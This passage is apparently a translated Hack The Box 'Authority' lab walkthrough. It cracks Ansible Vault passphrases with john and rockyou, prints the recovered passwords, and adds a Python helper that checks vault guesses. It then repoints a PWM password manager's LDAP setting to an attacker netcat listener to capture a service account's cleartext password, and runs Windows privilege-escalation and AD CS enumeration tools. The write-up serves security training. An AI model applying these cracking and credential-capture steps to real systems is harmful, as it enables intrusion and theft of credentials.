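            findings.append({"file": path, "line": lineno, "key": attr.group(1),
                             "kind": "plaintext_attribute", "value": redact(attr.group(2))})
    return findings


def scan_files(files):
    """files: mapping of path -> text. Returns all findings in path order."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_text(path, text))
    return findings


def summarize(findings):
    """Count findings per kind, e.g. {'plaintext': 2, 'ansible_vault': 3, ...}."""
    counts = {}
    for f in findings:
        counts[f["kind"]] = counts.get(f["kind"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_files(SAMPLES):
        print(f"{f['file']}:{f['line']}: {f['kind']} {f['key']} = {f['value']}")
    print(summarize(scan_files(SAMPLES)))
```

Vault blobs are reported separately from plaintext values on purpose: they are not secrets by themselves, but as the next section shows, anyone who can read them can test passphrase guesses offline, so a vault in a world-readable share still deserves a finding.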

Ansible Vault

Looking into the Ansible Vault entries under PWM/defaults/main.yml, I found the following article by NFLabs.

It looks like the vault can be decrypted by following that procedure, so let's try it.
Create a file containing the vault text as shown below (using pwm_admin_password as the example).

pwm_admin_password
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531

Now generate a hash for john from it.

┌──(root㉿kali)-[~/work]
└─# ansible2john pwm_admin_password          
pwm_admin_password:$ansible$0*0*15c849c20c74562a25c925c3e5a4abafd392c77635abc2ddc827ba0a1037e9d5*1dff07007e7a25e438e94de3f3e605e1*66cb125164f19fb8ed22809393b1767055a66deae678f4a8b1f8550905f70da5

Then we have john recover the passphrase.

┌──(root㉿kali)-[~/work]
└─# john hash --wordlist=./rockyou.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 128/128 SSE2 4x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@#$%^&*         (pwm_admin_password)     
1g 0:00:00:40 DONE (2023-07-16 22:51) 0.02472g/s 983.7p/s 983.7c/s 983.7C/s 001983..woodson
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Crack the remaining two the same way.

┌──(root㉿kali)-[~/work]
└─# john hash --wordlist=./rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 128/128 SSE2 4x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@#$%^&*         (pwm_admin_login)     
!@#$%^&*         (ldap_admin_password)     
2g 0:00:01:47 DONE (2023-07-16 22:55) 0.01859g/s 370.0p/s 740.0c/s 740.0C/s 001983..woodson
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
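What ansible2john and john are doing above is worth seeing in a few lines. The following is an added example (my code, not the writeup's and not Ansible's or john's) that parses the pwm_admin_password vault copied from the page, rebuilds the ansible2john line, and checks a candidate passphrase using only the standard library. It relies on Ansible's documented 1.1;AES256 layout: the hex body decodes to "salt\nhmac\nciphertext", PBKDF2-HMAC-SHA256 with the 10,000 iterations john reports derives a 32-byte AES key, a 32-byte HMAC key and a 16-byte IV in that order, and the HMAC-SHA256 is computed over the ciphertext. The passphrase "!@#$%^&*" is the one john found on this page.

```python
import binascii
import hashlib
import hmac

# Copied from the writeup: the pwm_admin_password vault body taken from
# PWM/defaults/main.yml on the Development share.
VAULT_TEXT = """$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531"""

PBKDF2_ITERATIONS = 10000  # what john reports as "Cost 1" for this format
KEY_LEN = 32               # AES-256 key size
IV_LEN = 16                # AES block size


def parse_vault(text):
    """Split a 1.1;AES256 vault into its three hex fields: salt, HMAC, ciphertext."""
    header, *body = [line.strip() for line in text.strip().splitlines() if line.strip()]
    if not header.startswith("$ANSIBLE_VAULT;1.1;AES256"):
        raise ValueError("unsupported vault header: " + header)
    # The body is the hex encoding of the text "salt_hex\nhmac_hex\nciphertext_hex".
    inner = binascii.unhexlify("".join(body)).decode("ascii")
    salt_hex, hmac_hex, ct_hex = inner.split("\n")
    return {"salt": salt_hex, "hmac": hmac_hex, "ciphertext": ct_hex}


def to_john_format(label, text):
    """Rebuild the ansible2john line: label:$ansible$0*0*salt*ciphertext*hmac."""
    v = parse_vault(text)
    return f"{label}:$ansible$0*0*{v['salt']}*{v['ciphertext']}*{v['hmac']}"


def derive_keys(passphrase, salt):
    """PBKDF2-HMAC-SHA256 -> (AES key, HMAC key, IV), in the order Ansible uses."""
    dk = hashlib.pbkdf2_hmac("sha256", passphrase.encode("utf-8"), salt,
                             PBKDF2_ITERATIONS, dklen=2 * KEY_LEN + IV_LEN)
    return dk[:KEY_LEN], dk[KEY_LEN:2 * KEY_LEN], dk[2 * KEY_LEN:]


def verify_passphrase(text, passphrase):
    """True if the HMAC stored in the vault matches the candidate passphrase.
    No decryption is needed: the tag alone confirms or rejects a guess,
    which is exactly why the vault text must be treated as sensitive."""
    v = parse_vault(text)
    _, hmac_key, _ = derive_keys(passphrase, binascii.unhexlify(v["salt"]))
    tag = hmac.new(hmac_key, binascii.unhexlify(v["ciphertext"]), hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, v["hmac"])


if __name__ == "__main__":
    print(to_john_format("pwm_admin_password", VAULT_TEXT))
    print("passphrase from the writeup verifies:", verify_passphrase(VAULT_TEXT, "!@#$%^&*"))
```

The takeaway for whoever owns such a share: the only thing protecting a vault is the passphrase's resistance to roughly a thousand PBKDF2 guesses per second per core (john's rate above), so a vault that ends up somewhere readable needs a long random passphrase and a rotation of whatever it protected.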

They all use the same passphrase, so let's use it to decrypt the Ansible Vault entries.

┌──(root㉿kali)-[~/work]
└─# ansible-vault decrypt ldap_admin_password
Vault password: 
Decryption successful

┌──(root㉿kali)-[~/work]
└─# cat ldap_admin_password 
DevT3st@123   

┌──(root㉿kali)-[~/work]
└─# ansible-vault decrypt pwm_admin_password 
Vault password: 
Decryption successful
                                                                                                                                                            
┌──(root㉿kali)-[~/work]
└─# cat pwm_admin_password 
pWm_@dm!N_!23 

┌──(root㉿kali)-[~/work]
└─# ansible-vault decrypt pwm_admin_login   
Vault password: 
Decryption successful
                                                                                                                                                            
┌──(root㉿kali)-[~/work]
└─# cat pwm_admin_login                  
svc_pwm 

Plenty of new credentials, but we still can't log in via WinRM!!
We need to explore yet another route.

project-PWM

Looking back over what we have collected so far, the port scan turned up an interesting port: 8443.
It is not a well-known port, but developers sometimes put an HTTPS (443) service on 8443 for development use.
※That is more of a developer's instinct, I think.
Let's access this port.
[screenshot: 3.png]
What is this, a password manager??
Searching around turns up the following site.

Looking a little further, I also found its GitHub repository.

This password manager apparently uses port 8443 by default.
Let's log in with the pwm_admin_password we recovered earlier (you have to enter through the Config Editor, otherwise you get rejected).
[screenshot: 4.png]
Oh, there is an LDAP configuration section. Let's point it at my own server.
[screenshot: 5.png]
Listening with nc, the credentials came flying in.

┌──(root㉿kali)-[~]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.20] from (UNKNOWN) [10.129.11.152] 51331
0Y`T;CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb lDaP_1n_th3_cle4r!

The CN gives the account name, svc_ldap, followed by the directory tree, and at the end is what looks like a password.
Let's try logging in with it.
[screenshot: 6.png]
Login successful! We have user privileges!!!

Privilege escalation

Information gathering

RustHound

I use RustHound instead of BloodHound. If you have already built it with Docker, there is no need to upload SharpHound or other exes by hand; you just get the zip file quickly, which is convenient.

To build it, run the following command.
※This takes a while.

┌──(root㉿kali)-[/opt/RustHound]
└─# docker build -t rusthound .
[+] Building 296.4s (11/11) FINISHED                                                                                                                        
 => [internal] load build definition from Dockerfile                                                                                                   0.1s
 => => transferring dockerfile: 368B                                                                                                                   0.0s
 => [internal] load .dockerignore                                                                                                                      0.1s
 => => transferring context: 2B                                                                                                                        0.0s
 => [internal] load metadata for docker.io/library/rust:1.64-slim-buster                                                                               2.9s
 => [1/6] FROM docker.io/library/rust:1.64-slim-buster@sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e                        18.7s
 => => resolve docker.io/library/rust:1.64-slim-buster@sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e                         0.0s
 => => sha256:e8da65b7aee6fe31a02a9b12e846ecb549032a0e21d23307414d1748fef914d0 194.36MB / 194.36MB                                                     7.7s
 => => sha256:da66962a6c5b9cae84a6e3e9ea67da5507b91ec0b4604016e07f5077286b1b2e 984B / 984B                                                             0.0s
 => => sha256:c761809aae5fe07769dab99f4404ca5d71a954934a74484e48eb06c0260ef484 742B / 742B                                                             0.0s
 => => sha256:085572de3c6eef7d59c5fe4feb8263dffa0425acb73747606391b2a8afec2446 4.85kB / 4.85kB                                                         0.0s
 => => sha256:4500a762c54620411ae491a547c66b61d577c1369ecbf5a7e91b4e153181854b 27.14MB / 27.14MB                                                       1.3s
 => => extracting sha256:4500a762c54620411ae491a547c66b61d577c1369ecbf5a7e91b4e153181854b                                                              3.2s
 => => extracting sha256:e8da65b7aee6fe31a02a9b12e846ecb549032a0e21d23307414d1748fef914d0                                                             10.7s
 => [internal] load build context                                                                                                                      0.1s
 => => transferring context: 532.71kB                                                                                                                  0.0s
 => [2/6] WORKDIR /usr/src/rusthound                                                                                                                   1.6s
 => [3/6] RUN apt-get -y update && apt-get -y install gcc libclang-dev clang libclang-dev libgssapi-krb5-2 libkrb5-dev libsasl2-modules-gssapi-mit m  28.6s
 => [4/6] COPY ./src/ ./src/                                                                                                                           0.1s
 => [5/6] COPY ./Cargo.toml ./Cargo.toml                                                                                                               0.1s 
 => [6/6] RUN cargo install --path .                                                                                                                 237.5s 
 => exporting to image                                                                                                                                 6.9s 
 => => exporting layers                                                                                                                                6.9s 
 => => writing image sha256:490ee8c18b28affff12ed0cb78992e21209368efd68a64772b027f2bf31f8bc8                                                           0.0s 
 => => naming to docker.io/library/rusthound  

Once the image has built, run RustHound from Docker.

┌──(root㉿kali)-[/opt/RustHound]
└─# docker run -v /opt/RustHound/work:/tmp/htb rusthound -d authority.htb -i 10.129.11.152 -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -o '/tmp/htb' -z --ldaps
---------------------------------------------------
Initializing RustHound at 06:48:59 on 07/18/23
Powered by g0h4n from OpenCyber
---------------------------------------------------

[2023-07-18T06:48:59Z INFO  rusthound] Verbosity level: Info
[2023-07-18T06:49:00Z INFO  rusthound::ldap] Connected to AUTHORITY.HTB Active Directory!
[2023-07-18T06:49:00Z INFO  rusthound::ldap] Starting data collection...
[2023-07-18T06:49:02Z INFO  rusthound::ldap] All data collected for NamingContext DC=authority,DC=htb
[2023-07-18T06:49:02Z INFO  rusthound::json::parser] Starting the LDAP objects parsing...
[2023-07-18T06:49:02Z INFO  rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2023-07-18T06:49:02Z INFO  rusthound::json::parser] Parsing LDAP objects finished!
[2023-07-18T06:49:02Z INFO  rusthound::json::checker] Starting checker to replace some values...
[2023-07-18T06:49:02Z INFO  rusthound::json::checker] Checking and replacing some values finished!
[2023-07-18T06:49:02Z INFO  rusthound::json::maker] 5 users parsed!
[2023-07-18T06:49:02Z INFO  rusthound::json::maker] 60 groups parsed!
[2023-07-18T06:49:02Z INFO  rusthound::json::maker] 1 computers parsed!
[2023-07-18T06:49:02Z INFO  rusthound::json::maker] 3 ous parsed!
[2023-07-18T06:49:02Z INFO  rusthound::json::maker] 1 domains parsed!
[2023-07-18T06:49:02Z INFO  rusthound::json::maker] 3 gpos parsed!
[2023-07-18T06:49:02Z INFO  rusthound::json::maker] 21 containers parsed!

RustHound Enumeration Completed at 06:49:02 on 07/18/23! Happy Graphing!

[2023-07-18T06:49:02Z INFO  rusthound::json::maker] /tmp/htb/20230718064902_authority-htb_rusthound.zip created!

Next, start neo4j and BloodHound.

┌──(root㉿kali)-[~]
└─# neo4j console
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
2023-07-18 06:53:04.421+0000 INFO  Starting...
2023-07-18 06:53:05.811+0000 INFO  This instance is ServerId{1400abe5} (1400abe5-d8c9-4976-8194-b3706a4b1946)
2023-07-18 06:53:07.375+0000 INFO  ======== Neo4j 4.4.16 ========
2023-07-18 06:53:09.318+0000 INFO  Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2023-07-18 06:53:09.332+0000 INFO  Setting up initial user from defaults: neo4j
2023-07-18 06:53:09.335+0000 INFO  Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2023-07-18 06:53:09.346+0000 INFO  Setting version for 'security-users' to 3
2023-07-18 06:53:09.349+0000 INFO  After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2023-07-18 06:53:09.352+0000 INFO  Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2023-07-18 06:53:09.751+0000 INFO  Bolt enabled on localhost:7687.
2023-07-18 06:53:10.869+0000 INFO  Remote interface available at http://localhost:7474/
2023-07-18 06:53:10.871+0000 INFO  id: A26888B9358589A230ADB2D47824D1A3D2343840A955695BD6BE045BDCABB6D9
2023-07-18 06:53:10.872+0000 INFO  name: system
2023-07-18 06:53:10.872+0000 INFO  creationDate: 2023-07-18T06:53:08.125Z
2023-07-18 06:53:10.872+0000 INFO  Started.

┌──(root㉿kali)-[~]
└─# bloodhound 
(node:33662) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron.  See https://github.com/electron/electron/issues/23506 for more information
(node:33731) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.

Load the resulting ZIP into BloodHound and take a look.
(Screenshot: 7.png)
Nothing useful turned up.

winPEAS

Download the winPEAS .bat file from the link below and run it on the target host.

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> upload winPEAS.bat                                                                                               
                                                                                                                                                            
Info: Uploading /root/work/winPEAS.bat to C:\Users\svc_ldap\Desktop\winPEAS.bat                                                                             
                                                                                                                                                            
Data: 47928 bytes of 47928 bytes copied                                                                                                                     
                                                                                                                                                            
Info: Upload successful! 
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> .\winPEAS.bat
                                                                                                                                                            
            ((,.,/((((((((((((((((((((/,  */                                                                                                                
     ,/*,..*(((((((((((((((((((((((((((((((((,                                                                                                              
   ,*/((((((((((((((((((/,  .*//((//**, .*((((((*                                                                                                           
   ((((((((((((((((* *****,,,/########## .(* ,((((((                                                                                                        
   (((((((((((/* ******************/####### .(. ((((((                                                                                                      
   ((((((..******************/@@@@@/***/###### /((((((                                                                                                      
   ,,..**********************@@@@@@@@@@(***,#### ../(((((                                                                                                   
   , ,**********************#@@@@@#@@@@*********##((/ /((((                                                                                                 
   ..(((##########*********/#@@@@@@@@@/*************,,..((((                                                                                                
   .(((################(/******/@@@@@#****************.. /((                                                                                                
   .((########################(/************************..*(                                                                                                
   .((#############################(/********************.,(                                                                                                
   .((##################################(/***************..(                                                                                                
   .((######################################(************..(                                                                                                
   .((######(,.***.,(###################(..***(/*********..(                                                                                                
   .((######*(#####((##################((######/(********..(                                                                                                
   .((##################(/**********(################(**...(                                                                                                
   .(((####################/*******(###################.((((                                                                                                
   .(((((############################################/  /((                                                                                                 
   ..(((((#########################################(..(((((.                                                                                                
   ....(((((#####################################( .((((((.                                                                                                 
   ......(((((#################################( .(((((((.                                                                                                  
   (((((((((. ,(############################(../(((((((((.                                                                                                  
       (((((((((/,  ,####################(/..((((((((((.                                                                                                    
             (((((((((/,.  ,*//////*,. ./(((((((((((.                                                                                                       
                (((((((((((((((((((((((((((/                                                                                                                
                       by carlospolop                                                                                                                       
                                                                                                                                                            
                                                                                                                                                            
/!\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script                                                                                   
   WinPEAS should be used for authorized penetration testing and/or educational purposes only.                                                              
   Any misuse of this software will not be the responsibility of the author or of any other collaborator.                                                   
   Use it at your own networks and/or with the network owner's permission.   

...(omitted)

Nothing of particular interest.

Powerless

Download Powerless.bat from the site below.

Also download AccessChk.exe from the link below, so that it can report more detailed access-rights information.

Run it.

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> upload accesschk64.exe                                                                                           
                                                                                                                                                            
Info: Uploading /root/work/accesschk64.exe to C:\Users\svc_ldap\Desktop\accesschk64.exe                                                                     
                                                                                                                                                            
Data: 1080552 bytes of 1080552 bytes copied                                                                                                                 
                                                                                                                                                            
Info: Upload successful!                                                                                                                                    
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> upload Powerless.bat                                                                                             
                                                                                                                                                            
Info: Uploading /root/work/Powerless.bat to C:\Users\svc_ldap\Desktop\Powerless.bat                                                                         
                                                                                                                                                            
Data: 16896 bytes of 16896 bytes copied                                                                                                                     
                                                                                                                                                            
Info: Upload successful!                                                                                                                                    
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> .\Powerless.bat                                                                                                  
------ System Info (Use full output in conjunction with windows-exploit-suggester.py)-------                                                                
Powerless.bat : Access is denied.                                                                                                                           
    + CategoryInfo          : NotSpecified: (Access is denied.:String) [], RemoteException                                                                  
    + FullyQualifiedErrorId : NativeCommandError                                                                                                            
                                                                                                                                                            
----- Architecture -------                                                                                                                                  
PROCESSOR_ARCHITECTURE=AMD64                                                                                                                                
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntel                                                                                     
PROCESSOR_LEVEL=6                                                                                                                                           
PROCESSOR_REVISION=5507                                                                                                                                     
                                                                                                                                                            
------ Users and groups (check individual user with 'net user USERNAME' ) Check user privileges for SeImpersonate (rotten potato exploit) -------           
Current User: svc_ldap                                                                                                                                      
                                                                                                                                                            
USER INFORMATION                                                                                                                                            
----------------                                                                                                                                            
                                                                                                                                                            
User Name    SID                                                                                                                                            
============ =============================================                                                                                                  
htb\svc_ldap S-1-5-21-622327497-3269355298-2248959698-1601     

...(omitted)

Nothing of particular interest.

PowerUp

Download it from the repository below and give it a run.

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> Import-Module C:\Users\svc_ldap\Desktop\PowerUp.ps1
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> Invoke-AllChecks

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...


[*] Checking for unquoted service paths...
Access denied 
At C:\Users\svc_ldap\Desktop\PowerUp.ps1:457 char:21
+     $VulnServices = Get-WmiObject -Class win32_service | Where-Object ...
+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand


[*] Checking service executable and argument permissions...
Access denied 
At C:\Users\svc_ldap\Desktop\PowerUp.ps1:488 char:5
+     Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pat ...
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand


[*] Checking service permissions...
Access denied 
At C:\Users\svc_ldap\Desktop\PowerUp.ps1:534 char:17
+     $Services = Get-WmiObject -Class win32_service | Where-Object {$_ ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand


[*] Checking %PATH% for potentially hijackable .dll locations...


HijackablePath : C:\Users\svc_ldap\AppData\Local\Microsoft\WindowsApps\
AbuseFunction  : Write-HijackDll -OutputFile 'C:\Users\svc_ldap\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll' -Command '...'

A HijackablePath shows up, but WindowsApps appears on pretty much every box, so it rarely means anything.
Doesn't look like anything useful here.

SharpUp.exe

Grab the whole set of binaries from the link above, since we will end up trying them later anyway.
From that set we use SharpUp.exe, running the audit command so that every module is checked.

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> .\SharpUp.exe audit

=== SharpUp: Running Privilege Escalation Checks ===
[!] Modifialbe scheduled tasks were not evaluated due to permissions.
[X] Unhandled exception in ModifiableServiceRegistryKeys: Exception has been thrown by the target of an invocation.
[X] Unhandled exception in ModifiableServices: Exception has been thrown by the target of an invocation.

[-] Not vulnerable to any of the 15 checked modules.


[*] Completed Privesc Checks in 5 seconds

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop>

Nothing useful here either.

Manual enumeration

cmdkey

*Evil-WinRM* PS C:\> cmdkey /list

Currently stored credentials:

* NONE *
*Evil-WinRM* PS C:\> 

No stored credentials.

whoami /priv

*Evil-WinRM* PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\> 

So we can at least add workstations to the domain (SeMachineAccountPrivilege).

ps

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> ps 

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    397      33    12568      21088              2152   0 certsrv
    159       9     6680        552              2444   0 conhost
    507      19     2244       5460               364   0 csrss
    171       9     1732       4788               476   1 csrss
    407      34    17236      24148              2528   0 dfsrs
    162       9     2000       6224              2932   0 dfssvc
    291      14     3916      13664              3960   0 dllhost
  10408    7405   130960     129320              2564   0 dns
    532      22    23148      42264               992   1 dwm
     54       6     1600       4212              2944   1 fontdrvhost
     54       6     1512       4020              2952   0 fontdrvhost
      0       0       56          8                 0   0 Idle
    206      16     6516      15572              2596   0 inetinfo
    140      12     1908       5824              2104   0 ismserv
    870      35   957656     923320              3808   0 javaw
    474      26    10736      47344              4748   1 LogonUI
   2091     171    66604      73928               616   0 lsass
    558      58    50148      77204              2224   0 Microsoft.ActiveDirectory.WebServices
    255      13     3284      10608              4244   0 msdtc
    135       8     1876       6784              2668   0 nssm
    517      54    73340      11404              2036   0 powershell
      0       8      336     100692                88   0 Registry
    642      36    17084      24008              1148   0 SearchIndexer
    605      14     5708      13544               608   0 services
     53       3      496       1068               272   0 smss
    497      26     6176      18816              3032   0 spoolsv
    189      11     1864       8400               296   0 svchost
    133      16     3952       8188               316   0 svchost
    210      12     1740       7468               360   0 svchost
    143       7     1408       6092               632   0 svchost
     90       5      932       3860               832   0 svchost
    746      16     5280      15136               852   0 svchost
    756      19     6044      12544               888   0 svchost
    241      10     1804       7068               936   0 svchost
    270      15     4244       9848              1032   0 svchost
    221       9     2140       7768              1128   0 svchost
    351      13    10448      15048              1164   0 svchost
    403      33     7068      16468              1272   0 svchost
    250      15     2988      12200              1332   0 svchost
    376      17     5340      13836              1340   0 svchost
    236      12     2688      11916              1348   0 svchost
    437       9     2768       9104              1360   0 svchost
    122       7     1244       5676              1384   0 svchost
    163      10     1720       8164              1484   0 svchost
    327      10     2564       8712              1528   0 svchost
    373      18     5164      14840              1536   0 svchost
    322      12     2144       9152              1588   0 svchost
    181      11     1928       8288              1668   0 svchost
    144       9     1596       6660              1752   0 svchost
    173       9     2152       7488              1784   0 svchost
    269      14     2576       8084              1840   0 svchost
    169      13     1780       7552              1856   0 svchost
    265      13     3724      11360              1892   0 svchost
    223      12     2216       9444              1904   0 svchost
    423      16    13100      21728              1944   0 svchost
    233      12     2696      12676              2028   0 svchost
    179      10     1808       8204              2080   0 svchost
    457      15     3008      11156              2112   0 svchost
    239      25     3856      13148              2164   0 svchost
    190      15     6080      10440              2204   0 svchost
    131       7     1300       5824              2240   0 svchost
    317      16    16124      18136              2276   0 svchost
    458      20    18100      31220              2460   0 svchost
    210      11     2276       8704              2724   0 svchost
    139       9     1592       6632              2744   0 svchost
    141       8     1520       6356              2900   0 svchost
    171      12     3888      11036              3068   0 svchost
    234      15     4708      12056              3084   0 svchost
    278      20     3944      13192              3124   0 svchost
    171      11     2188      13244              3144   0 svchost
    224      12     2144       7688              3196   0 svchost
    322      18     6052      22756              3464   0 svchost
    130       8     2840      10224              3796   0 svchost
    317      21     8864      15996              4636   0 svchost
    408      26     3544      13356              4684   0 svchost
    173      11     2356      13352              4740   0 svchost
    161      10     1984       7016              5088   0 svchost
    167       9     2652       7556              5940   0 svchost
   1483       0      192        156                 4   0 System
    214      16     2408      10660              3680   0 vds
    177      11     3244      11944              3112   0 VGAuthService
    151       8     1676       7300               604   0 vm3dservice
    140       9     1704       7672              2592   1 vm3dservice
    144      10     1784       7696              3456   1 vm3dservice
    404      23    10152      23436              3104   0 vmtoolsd
    173      11     1416       6992               468   0 wininit
    247      12     2584      18440               536   1 winlogon
    394      20    22392      33300              3848   0 WmiPrvSE
    699      27    54204      73672       2.80   2172   0 wsmprovhost

Active Directory Certificate Services (AD CS) is running!
The same service we saw on the Escape box.

Certify.exe

Check whether any vulnerable certificate templates exist.

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> upload Certify.exe
                                        
Info: Uploading /root/work/Certify.exe to C:\Users\svc_ldap\Desktop\Certify.exe
                                        
Data: 232104 bytes of 232104 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> .\Certify.exe find /vulnerable


   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |'
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=authority,DC=htb'

[*] Listing info about the Enterprise CA 'AUTHORITY-CA'

    Enterprise CA Name            : AUTHORITY-CA
    DNS Hostname                  : authority.authority.htb
    FullName                      : authority.authority.htb\AUTHORITY-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=AUTHORITY-CA, DC=authority, DC=htb
    Cert Thumbprint               : 42A80DC79DD9CE76D032080B2F8B172BC29B0182
    Cert Serial                   : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
    Cert Start Date               : 4/23/2023 9:46:26 PM
    Cert End Date                 : 4/23/2123 9:56:25 PM
    Cert Chain                    : CN=AUTHORITY-CA,DC=authority,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               HTB\Domain Admins             S-1-5-21-622327497-3269355298-2248959698-512
      Allow  ManageCA, ManageCertificates               HTB\Enterprise Admins         S-1-5-21-622327497-3269355298-2248959698-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : authority.authority.htb\AUTHORITY-CA
    Template Name                         : CorpVPN
    Schema Version                        : 2
    Validity Period                       : 20 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT_CHECK_USER_DS_CERTIFICATE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Document Signing, Encrypting File System, IP security IKE intermediate, IP security user, KDC Authentication, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Document Signing, Encrypting File System, IP security IKE intermediate, IP security user, KDC Authentication, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : HTB\Domain Admins             S-1-5-21-622327497-3269355298-2248959698-512
                                      HTB\Domain Computers          S-1-5-21-622327497-3269355298-2248959698-515
                                      HTB\Enterprise Admins         S-1-5-21-622327497-3269355298-2248959698-519
      Object Control Permissions
        Owner                       : HTB\Administrator             S-1-5-21-622327497-3269355298-2248959698-500
        WriteOwner Principals       : HTB\Administrator             S-1-5-21-622327497-3269355298-2248959698-500
                                      HTB\Domain Admins             S-1-5-21-622327497-3269355298-2248959698-512
                                      HTB\Enterprise Admins         S-1-5-21-622327497-3269355298-2248959698-519
        WriteDacl Principals        : HTB\Administrator             S-1-5-21-622327497-3269355298-2248959698-500
                                      HTB\Domain Admins             S-1-5-21-622327497-3269355298-2248959698-512
                                      HTB\Enterprise Admins         S-1-5-21-622327497-3269355298-2248959698-519
        WriteProperty Principals    : HTB\Administrator             S-1-5-21-622327497-3269355298-2248959698-500
                                      HTB\Domain Admins             S-1-5-21-622327497-3269355298-2248959698-512
                                      HTB\Enterprise Admins         S-1-5-21-622327497-3269355298-2248959698-519

How to read a vulnerable template is clearly summarized on the site below.

